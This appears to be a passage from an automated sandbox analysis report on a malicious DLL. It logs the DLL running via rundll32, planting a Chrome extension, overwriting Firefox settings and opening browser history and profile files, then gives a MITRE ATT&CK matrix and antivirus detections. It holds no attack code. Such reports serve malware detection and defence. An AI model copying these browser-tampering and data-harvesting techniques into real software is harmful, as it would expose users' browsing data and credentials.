Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\th\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\trJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\tr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ukJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\uk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\viJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\vi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CNJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CN\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TW\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\FirefoxJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\MozillaJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
Source: omni.ja.bak.3.drBinary or memory string: "vmware.com",
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Overwrites Mozilla Firefox settings
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempHROxPCJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempHROxPCJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempbXaqbVJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempbXaqbVJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\urlCache-current.binJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGnJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite-journalJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsBksRbJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempHROxPCJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\urlCache.binJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsBksRb\45e26519-596d-41a5-b290-e547b44111fdJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\scriptCache-current.binJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\startupCache.8.littleJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\webext.sc.lz4Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCachevXKGn\scriptCache-child-current.binJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCacheJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsBksRb\7278f154-e8f4-4235-84c5-c5c1c6af0084Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsBksRb\6fc53411-ad83-4cf6-a5f6-905f0f3f52e8Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js_tempbXaqbVJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions		11
Process Injection		13
Masquerading		1
OS Credential Dumping		1
Security Software Discovery		Remote Services11
Browser Session Hijacking		Data ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Rundll32		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS12
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
GqjUrFW.dll39%VirustotalBrowse
GqjUrFW.dll100%AviraHEUR/AGEN.1300641
GqjUrFW.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%0%URL Reputationsafe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
https://merino.services.mozilla.com/api/v1/suggest0%URL Reputationsafe
https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect0%URL Reputationsafe
https://screenshots.firefox.com0%URL Reputationsafe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report0%URL Reputationsafe
https://ads.stickyadstv.com/firefox-etp0%URL Reputationsafe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab0%URL Reputationsafe
https://monitor.firefox.com/breach-details/0%URL Reputationsafe
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM0%URL Reputationsafe
https://tracking-protection-issues.herokuapp.com/new0%URL Reputationsafe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report0%URL Reputationsafe
https://chromium.googlesource.com/chromium/src/0%URL Reputationsafe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report0%URL Reputationsafe
https://drive-daily-2.corp.google.com/0%URL Reputationsafe
https://fpn.firefox.com0%URL Reputationsafe
https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections0%URL Reputationsafe
